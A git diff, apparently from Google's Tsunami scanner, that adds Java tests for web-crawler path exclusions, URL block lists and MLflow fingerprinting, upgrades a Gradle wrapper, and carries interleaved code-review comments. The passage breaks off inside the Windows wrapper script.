+++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigsTest.java
@@ -149,4 +149,36 @@ public void contentTypeExclusions_whenBothCliAndConfigAreNotSet_returnsDefaultVa
 .containsExactly("application/zip", "application/gzip")
 .inOrder();
 }
+
+ @Test
+ public void pathExclusions_whenCliOptionSet_returnsCliOptionSetting() {
+ cliOptions.pathExclusions = ImmutableList.of(".*/logout$", ".*/dangerous$");
+ assertThat(configs.getPathExclusions())
+ .containsExactly(".*/logout$", ".*/dangerous$")
+ .inOrder();
+ }
+
+ @Test
+ public void pathExclusions_whenConfigPropertySet_returnsConfigPropertySetting() {
+ configProperties.pathExclusions = ImmutableList.of(".*/logout$", ".*/dangerous$");
+ assertThat(configs.getPathExclusions())
+ .containsExactly(".*/logout$", ".*/dangerous$")
+ .inOrder();
+ }
+
+ @Test
+ public void pathExclusions_whenBothCliAndConfigAreSet_cliOptionTakesPrecedence() {
+ cliOptions.pathExclusions = ImmutableList.of(".*/logout$", ".*/dangerous$");
+ configProperties.pathExclusions = ImmutableList.of(".*/login$", ".*/safe$");
+ assertThat(configs.getPathExclusions())
+ .containsExactly(".*/logout$", ".*/dangerous$")
+ .inOrder();
+ }
+
+ @Test
+ public void pathExclusions_whenBothCliAndConfigAreNotSet_returnsDefaultValue() {
+ cliOptions.pathExclusions = null;
+ configProperties.pathExclusions = null;
+ assertThat(configs.getPathExclusions()).isEmpty();
+ }
 }
diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterTest.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterTest.java
index 8681041df..86b669f26 100644
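Review bot: The four pathExclusions tests cover "set" and `null`, but not an explicitly empty list on the CLI while the config file carries exclusions. Whether `getPathExclusions()` treats an empty CLI list as "not set" or as an override is not visible in this hunk. For a setting that keeps the crawler away from endpoints such as `.*/logout$`, that choice decides whether the config-file exclusions still apply. I would add a test that sets `cliOptions.pathExclusions = ImmutableList.of();` and `configProperties.pathExclusions = ImmutableList.of(".*/logout$");` and asserts the intended result, so the precedence rule is pinned.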
--- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterTest.java +++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterTest.java @@ -19,6 +19,7 @@ import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; import static com.google.common.util.concurrent.Futures.immediateFuture; import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; import static com.google.tsunami.common.data.NetworkEndpointUtils.forIp; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.COMMON_LIB; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.FINGERPRINT_DATA_1; @@ -29,9 +30,11 @@ import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_2_ICON; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_3_CSS; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_3_ZIP; +import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_4_MLFLOW; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_IDENTITY_1; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_IDENTITY_2; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_IDENTITY_3; +import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_IDENTITY_4; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.fakeUrl; import com.google.common.collect.ImmutableList; 
@@ -42,6 +45,7 @@ import com.google.inject.Guice; import com.google.inject.Provides; import com.google.inject.assistedinject.FactoryModuleBuilder; +import com.google.tsunami.common.data.NetworkEndpointUtils; import com.google.tsunami.common.net.http.HttpClientModule; import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs.WebServiceFingerprinterCliOptions; import com.google.tsunami.plugins.fingerprinters.web.crawl.Crawler; @@ -52,6 +56,7 @@ import com.google.tsunami.proto.CrawlResult; import com.google.tsunami.proto.CrawlTarget; import com.google.tsunami.proto.FingerprintingReport; +import com.google.tsunami.proto.NetworkEndpoint; import com.google.tsunami.proto.NetworkService; import com.google.tsunami.proto.ServiceContext; import com.google.tsunami.proto.Software; @@ -60,9 +65,14 @@ import com.google.tsunami.proto.Version.VersionType; import com.google.tsunami.proto.VersionSet; import com.google.tsunami.proto.WebServiceContext; +import java.io.IOException; import java.util.Collection; import java.util.List; import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; @@ -74,12 +84,14 @@ public final class WebServiceFingerprinterTest { private final FakeCrawler fakeCrawler = new FakeCrawler(); private WebServiceFingerprinterCliOptions cliOptions; + private MockWebServer mockWebServer; @Inject WebServiceFingerprinter fingerprinter; @Before public void setUp() { cliOptions = new WebServiceFingerprinterCliOptions(); + mockWebServer = new MockWebServer(); Guice.createInjector( new AbstractModule() { @Override 
@@ -326,6 +338,62 @@ public void fingerprint_whenLimitContentSize_doNotRecordLargeCrawlResult() { .doesNotContain(SOFTWARE_3_CSS); } + @Test + public void fingerprint_mlflowServiceWithBasicAuth_fillsServiceContextWithApplication() + throws Exception { + fakeCrawler.setCrawlResults(ImmutableSet.of(SOFTWARE_4_MLFLOW)); + startMockMlflowWebServer(); + NetworkEndpoint endpoint = + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()); + NetworkService networkService = + NetworkService.newBuilder().setNetworkEndpoint(endpoint).setServiceName("http").build(); + + FingerprintingReport fingerprintingReport = + fingerprinter.fingerprint(TargetInfo.getDefaultInstance(), networkService); + + assertThat(fingerprintingReport) + .comparingExpectedFieldsOnly() + .isEqualTo( + FingerprintingReport.newBuilder() + .addNetworkServices( + networkService.toBuilder() + .setServiceName(SOFTWARE_IDENTITY_4.getSoftware()) + .setServiceContext( + ServiceContext.newBuilder() + .setWebServiceContext( + WebServiceContext.newBuilder() + .setApplicationRoot( + String.format( + "http://%s/", + NetworkEndpointUtils.toUriAuthority(endpoint))) + .setSoftware( + Software.newBuilder() + .setName(SOFTWARE_IDENTITY_4.getSoftware()))))) + .build()); + } + + private void startMockMlflowWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + final MockResponse unauthorizedResponse = + new MockResponse() + .setResponseCode(401) + .setBody( + "You are not authenticated. " + + "Please see https://www.mlflow.org/docs/latest/auth/index.html" + + "#authenticating-to-mlflow " + + "on how to authenticate"); + + @Override + public MockResponse dispatch(RecordedRequest request) { + return unauthorizedResponse; + } + }; + mockWebServer.setDispatcher(dispatcher); + mockWebServer.start(); + mockWebServer.url("/"); + } + private static NetworkService addServiceContext( NetworkService networkService, String appRoot, 
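Review bot: `startMockMlflowWebServer()` starts `mockWebServer`, but nothing in the visible hunks shuts it down: no `@After` method is added and `org.junit.After` is not among the imports. The listening socket and dispatcher threads therefore outlive the test and can interfere with later tests in the same JVM. I would add `@After public void tearDown() throws IOException { mockWebServer.shutdown(); }` together with the `org.junit.After` import. The trailing `mockWebServer.url("/");` discards its result and can be dropped. `addServiceContext` at the end of the hunk continues outside it.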
diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtilsTest.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtilsTest.java index 32302db38..8028cde02 100644 --- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtilsTest.java +++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtilsTest.java @@ -17,7 +17,10 @@ import static com.google.common.truth.Truth.assertThat; import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static org.junit.Assert.assertFalse; +import static org.junit.Assert.assertTrue; +import com.google.common.collect.ImmutableList; import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlConfig.Scope; import com.google.tsunami.proto.CrawlTarget; @@ -71,9 +74,11 @@ public void isCrawlTargetInScope_whenScopeEnforcementDisabled_alwaysReturnsTrue( CrawlTarget.newBuilder().setUrl("http://localhost:8080/in-scope/index.html").build())) .isTrue(); assertThat( - CrawlConfigUtils.isCrawlTargetInScope( - crawlConfig, - CrawlTarget.newBuilder().setUrl("http://localhost:8080/not-in-scope/index.html").build())) + CrawlConfigUtils.isCrawlTargetInScope( + crawlConfig, + CrawlTarget.newBuilder() + .setUrl("http://localhost:8080/not-in-scope/index.html") + .build())) .isTrue(); } 
@@ -124,4 +129,20 @@ public void isCrawlTargetInScope_whenEnforcingScopeCheckAndTargetNotInScope_retu
 .build()))
 .isFalse();
 }
+
+ @Test
+ public void isCrawlTargetInBlockList_inBlockList_returnsTrue() {
+ ImmutableList blockList = ImmutableList.of(".*/quit$", ".*/logout$");
+ CrawlTarget target = CrawlTarget.newBuilder().setUrl("http://127.0.0.1/logout").build();
+
+ assertTrue(CrawlConfigUtils.isCrawlTargetInBlockList(target, blockList));
+ }
+
+ @Test
+ public void isCrawlTargetInBlockList_notInBlockList_returnsFalse() {
+ ImmutableList blockList = ImmutableList.of(".*/quit$", ".*/logout$");
+ CrawlTarget target = CrawlTarget.newBuilder().setUrl("http://127.0.0.1/login").build();
+
+ assertFalse(CrawlConfigUtils.isCrawlTargetInBlockList(target, blockList));
+ }
 }
diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlActionTest.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlActionTest.java
index d4870faea..37c443985 100644
--- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlActionTest.java
+++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlActionTest.java
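Review bot: Both block-list tests use URLs that end exactly at the path, so they do not show how `isCrawlTargetInBlockList` handles a URL with a query string or a trailing slash. With `$`-anchored patterns such as `.*/logout$`, a target like `http://127.0.0.1/logout?next=/` would not match if the pattern is applied to the whole URL (the implementation is outside this hunk), and the crawler would still request the endpoint the operator meant to exclude. I would add a case for that URL and assert the intended outcome. `ImmutableList blockList` is also a raw type in both tests; `ImmutableList<String> blockList` is the usual form, though the type argument may simply have been lost in rendering.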
@@ -20,12 +20,17 @@ import static java.nio.charset.StandardCharsets.UTF_8; import com.google.common.io.Resources; +import com.google.inject.AbstractModule; import com.google.inject.Guice; import com.google.tsunami.common.net.http.HttpClient; import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs.WebServiceFingerprinterCliOptions; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs.WebServiceFingerprinterConfigProperties; import com.google.tsunami.proto.CrawlTarget; import java.io.IOException; import java.util.concurrent.ForkJoinPool; +import javax.inject.Inject; import okhttp3.mockwebserver.MockWebServer; import org.junit.After; import org.junit.Before; @@ -41,11 +46,28 @@ public final class SimpleCrawlActionTest { private SimpleCrawlerResults crawlerResults; private MockWebServer mockWebServer; private TestDataBuilder dataBuilder; + private WebServiceFingerprinterCliOptions cliOptions; + private WebServiceFingerprinterConfigProperties configProperties; + + @Inject WebServiceFingerprinterConfigs configs; @Before public void setUp() { + cliOptions = new WebServiceFingerprinterCliOptions(); + configProperties = new WebServiceFingerprinterConfigProperties(); + Guice.createInjector( + new AbstractModule() { + @Override + protected void configure() { + bind(WebServiceFingerprinterCliOptions.class).toInstance(cliOptions); + bind(WebServiceFingerprinterConfigProperties.class) + .toInstance(configProperties); + } + } + ).injectMembers(this); httpClient = - Guice.createInjector(new HttpClientModule.Builder().build()) + Guice.createInjector( + new HttpClientModule.Builder().build()) .getInstance(HttpClient.class) .modify() .setFollowRedirects(false) 
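Review bot: No visible test gives `configs` a non-empty exclusion list, so the crawl-time effect of path exclusions is never exercised in this file. The setUp hunk here builds `configs`, and the hunks that follow only pass it as an extra `SimpleCrawlAction` constructor argument. I would add a test that sets `cliOptions.pathExclusions = ImmutableList.of(".*/logout$");`, crawls a page that links to `/logout`, and asserts that `mockWebServer` never receives a request for that path. setUp's body continues outside this hunk.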
@@ -64,11 +86,13 @@ public void tearDown() throws IOException { public void getTargetUrl_always_returnsUrlFromCrawlTarget() { assertThat( new SimpleCrawlAction( - 0, - httpClient, - dataBuilder.buildCrawlConfig(), - dataBuilder.buildCrawlTargetForSeedPath("/path"), - crawlerResults).getTargetUrl()) + 0, + httpClient, + dataBuilder.buildCrawlConfig(), + dataBuilder.buildCrawlTargetForSeedPath("/path"), + crawlerResults, + configs) + .getTargetUrl()) .isEqualTo(mockWebServer.url("/path").toString()); } @@ -83,7 +107,8 @@ public void compute_whenUrlAlreadyVisited_doesNotCrawlSameTarget() { httpClient, dataBuilder.buildCrawlConfig(), CrawlTarget.getDefaultInstance(), - crawlerResults)); + crawlerResults, + configs)); assertThat(mockWebServer.getRequestCount()).isEqualTo(0); } @@ -99,7 +124,8 @@ public void compute_whenTargetUrlIsInvalid_ignoresCrawlTarget() { dataBuilder.buildCrawlTargetForSeedPath("").toBuilder() .setUrl("invalid-url") .build(), - crawlerResults)); + crawlerResults, + configs)); assertThat(mockWebServer.getRequestCount()).isEqualTo(0); assertThat(crawlerResults.getFinalResults()).isEmpty(); @@ -114,7 +140,8 @@ public void compute_whenHttpRequestError_ignoresCrawlTarget() { httpClient, dataBuilder.buildCrawlConfig(), dataBuilder.buildCrawlTargetForSeedPath("/timeout").toBuilder().build(), - crawlerResults)); + crawlerResults, + configs)); assertThat(mockWebServer.getRequestCount()).isEqualTo(1); assertThat(crawlerResults.getFinalResults()).isEmpty(); @@ -134,7 +161,8 @@ public void compute_whenSeedingUrlRedirects_followsRedirect() throws IOException httpClient, dataBuilder.buildCrawlConfig(), dataBuilder.buildCrawlTargetForSeedPath("/redirect"), - crawlerResults)); + crawlerResults, + configs)); assertThat(crawlerResults.getFinalResults()) .containsExactly( 
@@ -163,7 +191,8 @@ public void compute_whenExceedsMaxDepth_stopsCrawlingAtMaxDepth() throws IOExcep httpClient, dataBuilder.buildCrawlConfig().toBuilder().setMaxDepth(1).build(), dataBuilder.buildCrawlTargetForSeedPath("/redirect"), - crawlerResults)); + crawlerResults, + configs)); assertThat(crawlerResults.getFinalResults()) .containsExactly( @@ -186,7 +215,8 @@ public void compute_whenHtmlPageContainsOutOfScopeLink_ignoresOutOfScopeLink() httpClient, dataBuilder.buildCrawlConfig(), dataBuilder.buildCrawlTargetForSeedPath("/"), - crawlerResults)); + crawlerResults, + configs)); assertThat(crawlerResults.getFinalResults()) .containsExactly(dataBuilder.buildCrawlResult(0, "/", body)); @@ -209,7 +239,8 @@ private void assetCrawlResults(String testdataResourceName) throws Exception { httpClient, dataBuilder.buildCrawlConfig(), dataBuilder.buildCrawlTargetForSeedPath("/"), - crawlerResults)); + crawlerResults, + configs)); assertThat(crawlerResults.getFinalResults()) .containsExactly( diff --git a/google/portscan/nmap/gradle/wrapper/gradle-wrapper.jar b/google/portscan/nmap/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/portscan/nmap/gradle/wrapper/gradle-wrapper.jar and b/google/portscan/nmap/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/portscan/nmap/gradle/wrapper/gradle-wrapper.properties b/google/portscan/nmap/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/portscan/nmap/gradle/wrapper/gradle-wrapper.properties +++ b/google/portscan/nmap/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
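Review bot: The gradle-wrapper.properties hunk moves the download to gradle-7.0 but still sets no `distributionSha256Sum`, so the distribution archive is trusted on TLS alone. Adding `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip as published by Gradle>` makes the wrapper reject a substituted or corrupted archive. The same commit also replaces the binary `gradle-wrapper.jar`, which a diff cannot show; it should be checked against Gradle's published wrapper checksums before merge.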
diff --git a/google/portscan/nmap/gradlew b/google/portscan/nmap/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/portscan/nmap/gradlew +++ b/google/portscan/nmap/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/portscan/nmap/gradlew.bat b/google/portscan/nmap/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/portscan/nmap/gradlew.bat +++ b/google/portscan/nmap/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% 
@@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% 